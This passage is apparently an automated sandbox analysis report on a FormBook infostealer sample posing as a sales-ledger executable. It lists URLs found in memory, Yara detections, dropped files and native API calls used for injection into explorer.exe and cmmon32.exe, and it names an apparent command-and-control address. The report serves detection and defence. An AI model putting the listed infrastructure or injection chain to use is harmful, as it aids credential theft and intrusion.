Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).
                  Source: explorer.exe, 00000019.00000000.349774799.0000000008A2E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icogk
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coml1
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comti
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnto
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmcP
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(i
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-czti
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Bi)
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Pi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ftYi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Yi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d.
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/fi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/5i
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Pi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/fi
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/q
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s20
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpc
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp.
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpj
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                  Source: AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://www.nirsoft.net/
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmpString found in binary or memory: http://www.seniorlivingcaelderly.com
                  Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmpString found in binary or memory: http://www.seniorlivingcaelderly.com/suod/
                  Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/4
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/5
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                  Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
                  Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=05

                  E-Banking Fraud:

                  barindex
                  Yara detected FormBookShow sources
                  Source: Yara matchFile source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

                  System Summary:

                  barindex
                  Detected FormBook malwareShow sources
                  Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.iniJump to dropped file
                  Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.iniJump to dropped file
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A070 NtClose,24_2_0041A070
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A120 NtAllocateVirtualMemory,24_2_0041A120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00419F40 NtCreateFile,24_2_00419F40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00419FF0 NtReadFile,24_2_00419FF0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A06C NtClose,24_2_0041A06C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041A11A NtAllocateVirtualMemory,24_2_0041A11A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239910 NtAdjustPrivilegesToken,LdrInitializeThunk,24_2_01239910
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012399A0 NtCreateSection,LdrInitializeThunk,24_2_012399A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239860 NtQuerySystemInformation,LdrInitializeThunk,24_2_01239860
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239840 NtDelayExecution,LdrInitializeThunk,24_2_01239840
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012398F0 NtReadVirtualMemory,LdrInitializeThunk,24_2_012398F0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A20 NtResumeThread,LdrInitializeThunk,24_2_01239A20
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A00 NtProtectVirtualMemory,LdrInitializeThunk,24_2_01239A00
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A50 NtCreateFile,LdrInitializeThunk,24_2_01239A50
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239540 NtReadFile,LdrInitializeThunk,24_2_01239540
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012395D0 NtClose,LdrInitializeThunk,24_2_012395D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239710 NtQueryInformationToken,LdrInitializeThunk,24_2_01239710
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk,24_2_012397A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239780 NtMapViewOfSection,LdrInitializeThunk,24_2_01239780
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239660 NtAllocateVirtualMemory,LdrInitializeThunk,24_2_01239660
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012396E0 NtFreeVirtualMemory,LdrInitializeThunk,24_2_012396E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239950 NtQueueApcThread,24_2_01239950
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012399D0 NtCreateProcessEx,24_2_012399D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239820 NtEnumerateKey,24_2_01239820
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123B040 NtSuspendThread,24_2_0123B040
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012398A0 NtWriteVirtualMemory,24_2_012398A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239B00 NtSetValueKey,24_2_01239B00
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123A3B0 NtGetContextThread,24_2_0123A3B0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A10 NtQuerySection,24_2_01239A10
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239A80 NtOpenDirectoryObject,24_2_01239A80
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239520 NtWaitForSingleObject,24_2_01239520
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123AD30 NtSetContextThread,24_2_0123AD30
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239560 NtWriteFile,24_2_01239560
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012395F0 NtQueryInformationFile,24_2_012395F0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239730 NtQueryVirtualMemory,24_2_01239730
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123A710 NtOpenProcessToken,24_2_0123A710
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239760 NtOpenProcess,24_2_01239760
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123A770 NtOpenThread,24_2_0123A770
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239770 NtSetInformationFile,24_2_01239770
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239FE0 NtCreateMutant,24_2_01239FE0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239610 NtEnumerateValueKey,24_2_01239610
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239670 NtQueryInformationProcess,24_2_01239670
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01239650 NtQueryValueKey,24_2_01239650
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012396D0 NtCreateKey,24_2_012396D0
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C5A72 NtCreateFile,NtReadFile,NtClose,25_2_061C5A72
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D095D0 NtClose,LdrInitializeThunk,32_2_04D095D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09540 NtReadFile,LdrInitializeThunk,32_2_04D09540
